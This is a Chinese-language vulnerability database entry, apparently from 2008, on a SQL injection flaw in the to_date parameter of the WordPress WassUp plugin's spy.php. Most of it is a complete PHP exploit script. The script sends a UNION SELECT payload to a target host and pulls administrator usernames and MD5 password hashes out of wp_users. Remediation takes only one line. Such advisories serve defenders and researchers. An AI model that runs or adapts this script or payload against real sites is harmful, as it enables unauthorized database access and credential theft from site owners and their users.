WordPress WassUp插件spy.php脚本远程SQL注入漏洞
2008-10-04
系统编号:
WAVDB-01136
BUGTRAQ: 27525
影响版本:
WordPress WassUp 1.4 - 1.4.3
程序介绍:
WordPress是一款免费的论坛Blog系统。
漏洞分析:
WordPress的WassUp插件存在输入验证漏洞,远程攻击者可能利用此漏洞执行SQL注入攻击。
WordPress的WassUp插件中spy.php文件没有正确地验证对to_date参数的输入:
# if (isset($_GET['to_date'])) $to_date = htmlentities(strip_tags($_GET['to_date']));
# ...........
# spyview($from_date,$to_date,$rows);
#
# -In main.php
#
# function spyview ($from_date="",$to_date="",$rows="999") {
# ...........
# $qryC = $wpdb->get_results("SELECT id, wassup_id, max(timestamp) as max_timestamp, ip, hostname, searchengine,
# urlrequested, agent, referrer, spider, username, comment_author FROM $table_name WHERE timestamp BETWEEN $from_date AND
# $to_date GROUP BY id ORDER BY max_timestamp DESC");
这允许远程攻击者通过注入任意SQL代码控制SQL查询。
漏洞利用:
<?
# WordPress WassUp plugin v 1.4.3 Sql Injection Exploit
#
# Plugin Homepage-http://www.wpwp.org/
#
# Found by:enter_the_dragon
#
# Tested successfully on v 1.4-1.4.3
# (lower versions are possibly vulnerable too just check the source and modify the query as needed)
# Vuln code
#
# -In spy.php
#
# if (isset($_GET['to_date'])) $to_date = htmlentities(strip_tags($_GET['to_date']));
# ...........
# spyview($from_date,$to_date,$rows);
#
# -In main.php
#
# function spyview ($from_date="",$to_date="",$rows="999") {
# ...........
# $qryC = $wpdb->get_results("SELECT id, wassup_id, max(timestamp) as max_timestamp, ip, hostname, searchengine,
# urlrequested, agent, referrer, spider, username, comment_author FROM $table_name WHERE timestamp BETWEEN $from_date AND
# $to_date GROUP BY id ORDER BY max_timestamp DESC");
#
# Exploit
#
# $from_date and $to_date GET variables used in an sql query without being properly filtered so we can inject sql code
# using a query like ./spy.php?to_date=-1 group by id union select 1,2,3,4,5,6,7,8,9,10,11,12 from table
#
# If exploit is successful Wordpress administrator and users logins and md5 hashed passwords are retrieved
#
#
echo "\n";
echo "------WordPress WassUp plugin v 1.4.3 Sql Injection Exploit-------"."\n";
echo "-------------------coded by : enter_the_dragon--------------------"."\n";
echo "------------------------------------------------------------------"."\n";
if ($argc!=3)
{
echo " Usage: $argv[0] target_host wp_path \n";
echo " target_host: Your target ex www.target.com \n";
echo " wp_path: WordPress path ex /blog/ or / if wordpress is installed in the web servers root folder";
echo "\n";
exit;
}
$query=$argv[1];
$query.=$argv[2];
$query.="wp-content/plugins/wassup/spy.php?";
$query.="to_date=-1%20group%20by%20id%20union%20select%20null,null,null,concat(0x7c,user_login,0x7c,user_pass,0x7c),null,null,null,null,null,null,null,null%20%20from%20wp_users";
if(function_exists(curl_init))
{
$ch = curl_init("http://$query");
curl_setopt($ch, CURLOPT_HEADER,true);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_TIMEOUT,10);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)");
$html=curl_exec($ch);
$returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
curl_close($ch);
if ($returncode==404) exit ("Vulnerable script isnt there....Check your path :| \n");
$pattern="/\|(.*)?\|([a-z0-9]{32})\|/";
if(preg_match_all($pattern,$html,$matches))
{
$usernames=$matches[1];
$userpasses=$matches[2];
for($i=0;$i<count($usernames);$i++)
{
echo "User Login:$usernames[$i]\n" ;
echo "User Pass :$userpasses[$i]\n\n";
}
}
else
{
exit ("Exploit Failed :( \n");
}
}
else
exit("Error:Libcurl isnt installed \n");
?>
解决方案:
厂商补丁:
WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://wordpress.org/
信息来源:
<*来源:enter_the_dragon
链接:http://secunia.com/advisories/28702/
*>